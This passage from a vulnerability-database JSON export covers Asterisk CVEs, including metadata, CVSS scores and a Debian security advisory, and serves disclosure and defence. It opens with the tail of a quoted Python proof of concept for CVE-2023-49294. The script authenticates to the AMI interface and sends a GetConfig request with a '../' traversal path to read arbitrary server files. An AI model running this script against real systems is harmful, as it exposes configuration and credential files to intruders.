sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.connect((args.host, args.port))\n\n    # Read server banner\n    banner = sock.recv(DEFAULT_TCP_READ_SZ)\n    print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n    # Authenticate to the Asterisk AMI server\n    login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n    login_resp = tcp_send_rcv(sock, login_msg)\n    while b\u0027Authentication\u0027 not in login_resp:\n        login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n    if b\u0027Authentication accepted\u0027 not in login_resp:\n        print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n        sys.exit(1)\n    #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n    # Obtain file data via path traversal\n    traversal = \u0027../../../../../../../../\u0027\n    cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n        \u0027ActionID\u0027: args.action_id,\n        \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n        #\u0027Category\u0027: \u0027default\u0027,\n        #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n    })\n    resp = tcp_send_rcv(sock, cfg_msg)\n    while b\u0027Response\u0027 not in resp:\n        resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n    print(f\u0027\u0027, file=sys.stderr)\n    print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n    if b\u0027Error\u0027 in resp:\n        sys.exit(1)\n\n    pass  # Done\n            \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "PACKETSTORM",
            "id": "177819"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-49294",
            "trust": 2.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "176383",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "177819",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "PACKETSTORM",
            "id": "177819"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "id": "VAR-202312-2340",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 1.0
      },
      "last_update_date": "2024-03-30T22:40:30.232000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.0
          },
          {
            "problemtype": "Path traversal (CWE-22) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.9,
            "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
          },
          {
            "trust": 1.8,
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "trust": 1.8,
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          },
          {
            "trust": 1.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
          },
          {
            "trust": 0.1,
            "url": "https://www.debian.org/security/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
          },
          {
            "trust": 0.1,
            "url": "https://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "https://security-tracker.debian.org/tracker/asterisk"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
          },
          {
            "trust": 0.1,
            "url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
          },
          {
            "trust": 0.1,
            "url": "https://asterisk.org/"
          },
          {
            "trust": 0.1,
            "url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "PACKETSTORM",
            "id": "177819"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "PACKETSTORM",
            "id": "177819"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "date": "2024-01-05T14:31:02",
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "date": "2024-03-28T14:16:21",
            "db": "PACKETSTORM",
            "id": "177819"
          },
          {
            "date": "2023-12-14T20:15:52.730000",
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-16T02:49:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          },
          {
            "date": "2023-12-29T00:15:49.930000",
            "db": "NVD",
            "id": "CVE-2023-49294"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020239"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "info disclosure",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "177819"
          }
        ],
        "trust": 0.1
      }
    }

    VAR-202312-0487

    Vulnerability from variot - Updated: 2024-02-01 22:52

    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512


    Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq


    Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

    Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

    CVE-2023-37457

    The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
    the available buffer space for storing the new value of a header. By doing
    so this can overwrite memory or cause a crash. This is not externally
    exploitable, unless dialplan is explicitly written to update a header based
    on data from an outside source. If the 'update' functionality is not used
    the vulnerability does not occur.
    

    CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
    higher level media transport which is stacked upon a lower level media
    transport such as UDP and ICE. Currently a higher level transport is not
    synchronized with its lower level transport that may introduce a
    use-after-free issue. This vulnerability affects applications that have
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
    transport other than UDP. This vulnerability’s impact may range from
    unexpected application termination to control flow hijack/memory
    corruption.
    

    CVE-2023-49294

    It is possible to read any arbitrary file even when the `live_dangerously`
    option is not enabled.
    

    For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

    We recommend that you upgrade your asterisk packages.

    For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

    iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202312-0487",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "18.20.1"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "19.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "18.9"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "16.8.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "20.5.1"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "21.0.0"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sangoma",
            "version": "13.13.0"
          },
          {
            "model": "certified asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "sangoma",
            "version": null
          },
          {
            "model": "asterisk",
            "scope": null,
            "trust": 0.8,
            "vendor": "digium",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "18.20.1",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "20.5.1",
                    "versionStartIncluding": "19.0.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Debian",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "176383"
          }
        ],
        "trust": 0.1
      },
      "cve": "CVE-2023-49786",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.2,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security-advisories@github.com",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 5.9,
                "baseSeverity": "Medium",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2023-49786",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-49786",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "security-advisories@github.com",
                "id": "CVE-2023-49786",
                "trust": 1.0,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49294\n\n    It is possible to read any arbitrary file even when the `live_dangerously`\n    option is not enabled. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-49786"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-024446"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
